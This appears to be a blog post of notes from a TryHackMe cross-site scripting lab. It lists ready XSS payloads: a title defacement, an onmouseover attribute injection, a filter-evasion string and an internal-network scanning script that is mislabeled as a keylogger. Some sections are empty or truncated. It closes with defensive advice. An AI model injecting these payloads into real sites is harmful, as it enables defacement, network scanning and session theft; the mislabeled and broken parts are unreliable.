THM — Cross-Site Scripting (XXS)

  • Persistent/stored
  • Reflected
  • Cookie Stealing
  • Keylogging
  • Webcam snapshot
  • Phishing
  • Port Scanning
  • Other browser based exploits

Stored XSS

Add a Comment:

Steal the Cookie:


Change the Title:

<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>

Steal Jack’s cookie:


Reflected XSS



test" onmouseover="alert('Test')"
test" onmouseover=" = 'red';

Keylogger with XSS

<script>for (let i = 0; i < 256; i++) { let ip = '192.168.0.' + i let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">' document.body.innerHTML += code }</script>

Filter Evasion

<img src=x onerror=alert('Hello');>0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss><style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>

Protection Methods

  1. Escaping — Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
  2. Validating Input — This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
  3. Sanitising — Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store